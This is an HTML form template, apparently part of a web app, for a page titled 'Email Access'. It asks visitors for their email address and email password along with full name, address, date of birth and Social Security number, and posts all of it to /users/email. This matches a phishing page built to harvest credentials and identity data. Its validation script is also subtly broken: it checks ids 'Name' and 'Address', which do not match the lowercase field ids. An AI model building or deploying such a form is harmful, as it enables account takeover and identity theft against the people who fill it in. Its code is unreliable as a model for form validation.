<div class="row mt-5">
    <div class="col-md-6 m-auto">
      <div class="card card-body">
        <h1 class="text-center mb-3"><i class="fas fa-sign-in-alt"></i>Email Access</h1>

         
        <!-- Red Text Alert for Missing Fields -->
        <div class="alert alert-danger" id="missingFieldsAlert" style="display: none;">
          Please fill out all fields.
        </div>
      
      
        <form action="/users/email" method="POST">
          <div class="form-group">
            <label for="email">Email</label>
            <input
              type="email"
              id="email"
              name="email"
              class="form-control"
              placeholder="Enter Your Email"
            />
          </div>
          <div class="form-group">
            <label for="password">Password</label>
            <input
              type="password"
              id="password"
              name="password"
              class="form-control" 
              placeholder="Enter Your Email Password"
            />
          </div>
          <div class="form-group">
            <label for="name">Name</label>
            <input
              type="name"
              id="name"
              name="name"
              class="form-control" 
              placeholder="Enter Your Full Name"
            />
          </div>
          <div class="form-group">
            <label for="Address">Address</label>
            <input
              type="address"
              id="address"
              name="address"
              class="form-control" 
              placeholder="Enter Your Address"
            />
          </div>
          <div class="form-group">
            <label for="dob">DOB</label>
            <input
              type="date"
              id="dob"
              name="dob"
              class="form-control" 
              placeholder="Enter Your Date of Birth"
            />
          </div>
          <div class="form-group">
            <label for="ssn">SSN</label>
            <input
              type="ssn"
              id="ssn"
              name="ssn"
              class="form-control" 
              placeholder="Enter Your SSN"
            />
          </div>
          <button type="submit" class="btn btn-primary btn-block">Submit</button>
        </form>     
      </div>
    </div>
    <script>
      document.querySelector('form').addEventListener('submit', function(event) {
        const requiredFields = ['email', 'password', 'Name', 'Address', 'dob', 'ssn'];
        let missingFields = false;
        
        for (const field of requiredFields) {
          if (!document.getElementById(field).value) {
            missingFields = true;
            break;
          }
        }
        
        if (missingFields) {
          event.preventDefault();
          document.getElementById('missingFieldsAlert').style.display = 'block';
        }
      });
    </script>
  </div>